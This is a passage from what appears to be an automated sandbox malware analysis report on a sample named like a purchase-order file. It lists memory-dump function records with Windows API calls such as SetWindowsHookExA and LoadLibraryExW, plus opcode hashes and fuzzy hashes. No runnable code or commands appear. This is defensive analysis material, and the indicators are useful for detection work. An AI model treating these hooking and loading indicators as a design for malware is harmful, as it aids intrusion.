                                                        • Opcode Fuzzy Hash: 850f800270b613de773b0109bd70acbee76fb423845abbc2a395142431b4f0c8
                                                        • Instruction Fuzzy Hash: E041F2B4D00719DBDB24CFAAC9847CEBBB5BF48304F24809AD408BB255DB75694ACF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 024C59C9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120972982.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24c0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 490663b9b37f37b619ba97a0700c70b90fabee900d1117c55478d81c9825751a
                                                        • Instruction ID: 05cbd7537ad1618f52c8f9a8a84e44d4507e4c4d016d0050b6dfb4faeaba5eab
                                                        • Opcode Fuzzy Hash: 490663b9b37f37b619ba97a0700c70b90fabee900d1117c55478d81c9825751a
                                                        • Instruction Fuzzy Hash: 604102B4D00719CBDB24DFAAC8447DEBBB5BF48304F24809AD408BB255DB756945CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024CD306,?,?,?,?,?), ref: 024CD3C7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120972982.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24c0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: d4e0c09fd84c7b0dfc54f94a81239c280595009cdce8d7eb354cef7c0099adba
                                                        • Instruction ID: 12a3b79b987a8bda4aed0db68a042e4ab01d3cf88907a61977f4114ed70a88b5
                                                        • Opcode Fuzzy Hash: d4e0c09fd84c7b0dfc54f94a81239c280595009cdce8d7eb354cef7c0099adba
                                                        • Instruction Fuzzy Hash: E621E3B5D00348DFDB10CF9AD984ADEBBF8EB48310F14846AE959A7311D378A954CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024CD306,?,?,?,?,?), ref: 024CD3C7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120972982.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24c0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: f26854f28afe6bd15c59d4cce603d7ae4906fd31029e562ef67cd25056153a0e
                                                        • Instruction ID: ef7ae7806fd0990c0cc60419aed53902b631b0eac5f8d8b92b33b12ee3806519
                                                        • Opcode Fuzzy Hash: f26854f28afe6bd15c59d4cce603d7ae4906fd31029e562ef67cd25056153a0e
                                                        • Instruction Fuzzy Hash: F621E4B5D00218DFDB10CFAAD984ADEBFF4EB48324F14842AE959A7311C374A950CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 076DC38B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4129666908.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_76d0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: HookWindows
                                                        • String ID:
                                                        • API String ID: 2559412058-0
                                                        • Opcode ID: 0a78e7b91fc08b9008e91dcef2418a19cbec687815965136718eef0457629091
                                                        • Instruction ID: c70899d8a5ef7ffc3dd9e8f3776139fc029bad57f95fea843b36f000809d65ca
                                                        • Opcode Fuzzy Hash: 0a78e7b91fc08b9008e91dcef2418a19cbec687815965136718eef0457629091
                                                        • Instruction Fuzzy Hash: 132135B1D002498FCB14CFA9C844BEEFBF1AF88314F10842AE459A7250C7B5A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 076DC38B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4129666908.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_76d0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: HookWindows
                                                        • String ID:
                                                        • API String ID: 2559412058-0
                                                        • Opcode ID: f4e80837a0e2e6aa69b29a0f0c1b1e160110a0f6bcb9f923b55ae0e5bb1b45da
                                                        • Instruction ID: f552cacb7b2bb3969c6ea9aadf731798636638acc12dccadfb7490ecf4a8e092
                                                        • Opcode Fuzzy Hash: f4e80837a0e2e6aa69b29a0f0c1b1e160110a0f6bcb9f923b55ae0e5bb1b45da
                                                        • Instruction Fuzzy Hash: 8621E3B5D002199FCB14DFAAC844BEEFBF5AB88324F10842AE459A7250C775A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,024CB141,00000800,00000000,00000000), ref: 024CB352
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120972982.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24c0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: bbc80d866c4fca870eeb77983625aec7ca6cbdadb3d78fe3f15ee0a9dcfe4622
                                                        • Instruction ID: 0801c552cb8a38472307fbe1beeb74912819a93fa7c1d04a80352765e1b0a039
                                                        • Opcode Fuzzy Hash: bbc80d866c4fca870eeb77983625aec7ca6cbdadb3d78fe3f15ee0a9dcfe4622
                                                        • Instruction Fuzzy Hash: AB1114B69003489FDB10CF9AC444ADFFBF4EB88314F10842EE559A7210C375A545CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,024CB141,00000800,00000000,00000000), ref: 024CB352
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120972982.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24c0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 2a48ac7710927d24ebf27e774899bc9d5c5f610548fbc9dfb3ab858116b0303b
                                                        • Instruction ID: 767ea1a694df1756148d3872bf3a414c4aebeb16365044e24ee703d3cb2abca4
                                                        • Opcode Fuzzy Hash: 2a48ac7710927d24ebf27e774899bc9d5c5f610548fbc9dfb3ab858116b0303b
                                                        • Instruction Fuzzy Hash: DB1103B69003498FDB10CFAAC544ADEFBF4EB88314F10842AE829A7210C375A545CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 076D7BAF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4129666908.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_76d0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID:
                                                        • API String ID: 1890195054-0
                                                        • Opcode ID: f84254ea83091c37b5153f79aed6fd49bb59a219bf36670033dfa9ae71826ad5
                                                        • Instruction ID: b336b61a824de698a1ab01ac45ee1ff97a7e7030be8ec0fec0694e613ede8d3d
                                                        • Opcode Fuzzy Hash: f84254ea83091c37b5153f79aed6fd49bb59a219bf36670033dfa9ae71826ad5
                                                        • Instruction Fuzzy Hash: F01123B1C002699BCB10CFAAC444BDEFBF4AF48320F10816AE818B7240D378A940CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 024CB0C6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120972982.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24c0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: dd693883fe96cb050893ea5c65c4bfc5a13d65196a368bc8ffcec29ab281d4e3
                                                        • Instruction ID: a45e9c1ef5b9dbf90857096bbf1249e0632c3d89909f83dd24ee7e45ddaa14e2
                                                        • Opcode Fuzzy Hash: dd693883fe96cb050893ea5c65c4bfc5a13d65196a368bc8ffcec29ab281d4e3
                                                        • Instruction Fuzzy Hash: 6811CDB69003498FDB20DF9AD444A9EFBF4EB88224F20846AD469A7610C375A545CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        • Opcode ID: b3424c5fdb5a736a6662ad3148ac98fa5ce810330f41e36544eb818883a2079e
                                                        • Instruction ID: 491f50cb2c30d306901e92011e429ffc9309de5c36032825622ed39326ada94c
                                                        • Opcode Fuzzy Hash: b3424c5fdb5a736a6662ad3148ac98fa5ce810330f41e36544eb818883a2079e
                                                        • Instruction Fuzzy Hash: 4A31A1B5E002198FCB48DFA9C8849EDBBB5FF49301F10812AE919AB365D7316906CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: bdHE
                                                        • API String ID: 0-3248747386
                                                        • Opcode ID: b3aa9f9b33e9f2132a4a8eda84ea8881aa36a5e86c286c2385e131c52ccd7ebf
                                                        • Instruction ID: 51966ac42869ef9075f7d0ef723eea626a9c7e2b14529faff1719ec3d616e74c
                                                        • Opcode Fuzzy Hash: b3aa9f9b33e9f2132a4a8eda84ea8881aa36a5e86c286c2385e131c52ccd7ebf
                                                        • Instruction Fuzzy Hash: 282185B4A00308DFDB14DFA4C5986ADBBB6FB89300F208119D4196B795DB359C85CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: d/dq
                                                        • API String ID: 0-2156024220
                                                        • Opcode ID: 9f3370e31b80566de226fad6f6d88f3653be1c178bce32e45054cbf7afcf65f5
                                                        • Instruction ID: bbb25609905c11410812945164acf887ff1f46c1e9668a3744ff0469d859d9dc
                                                        • Opcode Fuzzy Hash: 9f3370e31b80566de226fad6f6d88f3653be1c178bce32e45054cbf7afcf65f5
                                                        • Instruction Fuzzy Hash: CB118BB0D09248EFCB1AEFB8E8006EDBF75FB46310F2081AAE844A7291D7355A55DF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: bb63caee6d992a85300e5095d0245c5d043e633140663e00c20b27f0b2709d1a
                                                        • Instruction ID: b541fe60604a4b6d2fe95bc278befccf5a449a01c1d3532f304edad445086ed7
                                                        • Opcode Fuzzy Hash: bb63caee6d992a85300e5095d0245c5d043e633140663e00c20b27f0b2709d1a
                                                        • Instruction Fuzzy Hash: 1DE0C2704082C0DFEB068B64C04CA997F3DFB1B205B2010DCE49A5B115C7399942CF01
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6b83d7acc1a564c3279594ab205dc757f2df77f98c78a294e9e365c633bf42cd
                                                        • Instruction ID: 18a7ded6119fd74491e233ea552d79b310e86d46f8045044f06581df8acc09f9
                                                        • Opcode Fuzzy Hash: 6b83d7acc1a564c3279594ab205dc757f2df77f98c78a294e9e365c633bf42cd
                                                        • Instruction Fuzzy Hash: 0EB16EB0E0024ACFDB51DFA9C8857DDBBF2BF48714F148129E815AB294EB749849CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe77e6b3b7c53df40e61f3428dd9466a94acf96fab9d6d125095653b6441b40b
                                                        • Instruction ID: 3ba634e64f4a29b4f705cc1e7dc84fad5bb8239bf5b946a1657b7a48dd91e2cb
                                                        • Opcode Fuzzy Hash: fe77e6b3b7c53df40e61f3428dd9466a94acf96fab9d6d125095653b6441b40b
                                                        • Instruction Fuzzy Hash: F8A14DB0E0020ACFDB51EFA9D8957DDBBF6AF48314F148129E854E7294EB749846CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6552118f6f81efa3d31c9a67f883d8ea3fd4e2953ec22aadb42b74a3be220eca
                                                        • Instruction ID: a1b989b11077abf0cd3e4b220b0f83b24642bcd2c04d6d30b89e3bde8b6efe4b
                                                        • Opcode Fuzzy Hash: 6552118f6f81efa3d31c9a67f883d8ea3fd4e2953ec22aadb42b74a3be220eca
                                                        • Instruction Fuzzy Hash: 3FA16C30B002049FCB24EB68E944A5DB7F3EF84314F158569E459ABBA1DB75EC45CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 12b7ca748941caec9a6fad7ce74d2cdecbc929d6465c66172cf61ec87eb325f8
                                                        • Instruction ID: 2919a11ee99b15ea7d352fbde133b68f5bc47dec0000bd4f3fe2e905c4204c0e
                                                        • Opcode Fuzzy Hash: 12b7ca748941caec9a6fad7ce74d2cdecbc929d6465c66172cf61ec87eb325f8
                                                        • Instruction Fuzzy Hash: 7FA16FB4E00209DFDB51DFA8C9817DDBBF2BF48314F248129E419A7294EB749849CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b4aa443ac80310585eb7132276867f6e6e4626a0377283c523757336a2b97bad
                                                        • Instruction ID: 01b57a3e8a6f1938311c8cf21bb385d7e8e2a0086cf1a30bb2aa2ad595099a16
                                                        • Opcode Fuzzy Hash: b4aa443ac80310585eb7132276867f6e6e4626a0377283c523757336a2b97bad
                                                        • Instruction Fuzzy Hash: 7761D271F400114FCB11AA7EC88466FBAD7EFD8620B15443AE94EDB364DE65ED0287D2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f0b4ac4c5e1192659182bdd54189e09f8e3deb52d9e6817f8d73d77d033d17da
                                                        • Instruction ID: 5c40fec83461db1e7b03e083b8f4e527e46b7f7170b391f1a75700512e58bc33
                                                        • Opcode Fuzzy Hash: f0b4ac4c5e1192659182bdd54189e09f8e3deb52d9e6817f8d73d77d033d17da
                                                        • Instruction Fuzzy Hash: A5911674E15208DFDB54DFA4D899BEDBBB6FB8A301F109025E80AA7381DB746981CF10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e8087c79d0bca35a6187577646aecb213ac759975378f260dbae94a89dfb8f17
                                                        • Instruction ID: 66c9851928be10f199e51440e0eab5b4f2908b17d82aafe0097b91ca98f2c617
                                                        • Opcode Fuzzy Hash: e8087c79d0bca35a6187577646aecb213ac759975378f260dbae94a89dfb8f17
                                                        • Instruction Fuzzy Hash: B691F574E15218DFDB54DFA4D899BEDBBB6FB89301F109025E80AA7381DB706981CF10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5fa8fffee6e5e2aaaca769c5e2bb7d3ab2dd71158550389fa658840a5382c602
                                                        • Instruction ID: f565a1f368dff3e82e90de06cd41e96e81eda3a509c52e99d7d989c3987a356a
                                                        • Opcode Fuzzy Hash: 5fa8fffee6e5e2aaaca769c5e2bb7d3ab2dd71158550389fa658840a5382c602
                                                        • Instruction Fuzzy Hash: 8A717CB0E0020ADFDB51DFA9C8847DEBBF6AF48314F148129E429A7294DB759846CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 10d152ef97cb4145e99e79c4765eaf2288c774ef8ac873298457edccb00b6703
                                                        • Instruction ID: 098c78f43fdeeb5126f807f168fb83792a87648436a5200424470029c2e7abea
                                                        • Opcode Fuzzy Hash: 10d152ef97cb4145e99e79c4765eaf2288c774ef8ac873298457edccb00b6703
                                                        • Instruction Fuzzy Hash: 2B717DB0E00209DFDF55DFA9C88479EBBF6AF88314F148029E419E7294EB759846CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eaf34734136a7b345ff4f82dbeae9215b65697d752944aa669e271e421b62b32
                                                        • Instruction ID: d63d77bea7e520848f5e3c7d7e695fbbfaee1860da71e43fe9ab8f5059058fd8
                                                        • Opcode Fuzzy Hash: eaf34734136a7b345ff4f82dbeae9215b65697d752944aa669e271e421b62b32
                                                        • Instruction Fuzzy Hash: D56127B4A19218CFCB95EF94C484AADB7B9FF4D311F129195E809AB395C734AD84CF20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a83638abb92d62e205be9e36968bcadcf05b5693b2a97cbe65131d60f0d20ef8
                                                        • Instruction ID: 1c947d3f41ab9641abc1febae38657481f7eee34707891f6e0812ceb343566be
                                                        • Opcode Fuzzy Hash: a83638abb92d62e205be9e36968bcadcf05b5693b2a97cbe65131d60f0d20ef8
                                                        • Instruction Fuzzy Hash: 27417571A406058FCF30CFA9D9816AFFBB1FB84310F10492AE295D7565D331E9498B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1ff153910c03f0c56e532bbf0c22d508617683ba1955fca4454785631862d5d5
                                                        • Instruction ID: 31d3fbf127de534af2ee3a8918f72e29baa0db0d593080b139d499e2a60fb939
                                                        • Opcode Fuzzy Hash: 1ff153910c03f0c56e532bbf0c22d508617683ba1955fca4454785631862d5d5
                                                        • Instruction Fuzzy Hash: BA4137B1E1820D9BDB48DFAAC4406FEBBF6EB8D301F14E069D419A3291E7345A42DF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 225161eb1394c50d64dbaab31d0e006ecfc2cdd6e6843083fda98d7f986c18ec
                                                        • Instruction ID: e5a63a18e0ea5ba42270924a57b7e7d42229a878f13c5ab1985047f031e27b30
                                                        • Opcode Fuzzy Hash: 225161eb1394c50d64dbaab31d0e006ecfc2cdd6e6843083fda98d7f986c18ec
                                                        • Instruction Fuzzy Hash: 7131D5B4C3D108CBCB48EF98D0806FCBBB9AB5B311F956116D40AB3282D7389481CF14
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5b65d440fe8718bf66029d215d49880f4710d516d4e84c85a6310771189f94b9
                                                        • Instruction ID: 96702dd4ce09a841e7a3769c720ce0eaae4b7a146a0fd8529921075f71c324f4
                                                        • Opcode Fuzzy Hash: 5b65d440fe8718bf66029d215d49880f4710d516d4e84c85a6310771189f94b9
                                                        • Instruction Fuzzy Hash: 304105B5E006089FDB48DFAAD8446DEBBF6FF89300F149029D805AB394EB745946DF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 68c5807677d290b88d08fc6fb4c6adc8a35fbfce5d411bb4b7175eb707b2ea77
                                                        • Instruction ID: 7fc0e9325d57293c573765e6fa900563a24b614f49b145f46ea4343397bd1df7
                                                        • Opcode Fuzzy Hash: 68c5807677d290b88d08fc6fb4c6adc8a35fbfce5d411bb4b7175eb707b2ea77
                                                        • Instruction Fuzzy Hash: 6A21B1B55082925FDB337A38E4567A93B30DB06268F1005A7E056CA6D2CB59CDC5CBF2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e9993b15817317c5b6fd02a2e00ad4902813a9d080393e4d815faf59ac1e2994
                                                        • Instruction ID: 1c74648886e2ff8230cd09c1ceb2abc3918aca1ad9aaacdb62da91a062964b36
                                                        • Opcode Fuzzy Hash: e9993b15817317c5b6fd02a2e00ad4902813a9d080393e4d815faf59ac1e2994
                                                        • Instruction Fuzzy Hash: 6E317EB1E18208DFDB48DF9AC4006EEBBF6EB8D301F15E02AD419A3291E7304A429F54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 472f18811fdb78c494064f7137e5535745a803965153a9e0a9b14067bbd2c59c
                                                        • Instruction ID: fb4350ccfc877cd03ba747d77d327c9700650cb856377716641fbf48230dac81
                                                        • Opcode Fuzzy Hash: 472f18811fdb78c494064f7137e5535745a803965153a9e0a9b14067bbd2c59c
                                                        • Instruction Fuzzy Hash: E741E2B1900249DFDB10DFA9C480ADEBFB5AF48310F10842AE419AB254DB359945CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8b503e51e19d34fcad703c7a4e0e5e00d87b01437a86e6efbae5a0a4a87734d0
                                                        • Instruction ID: eccaf282194d25d7dbc2c9ecfba99df8dd496517ef16d98e5b18552145fd05bd
                                                        • Opcode Fuzzy Hash: 8b503e51e19d34fcad703c7a4e0e5e00d87b01437a86e6efbae5a0a4a87734d0
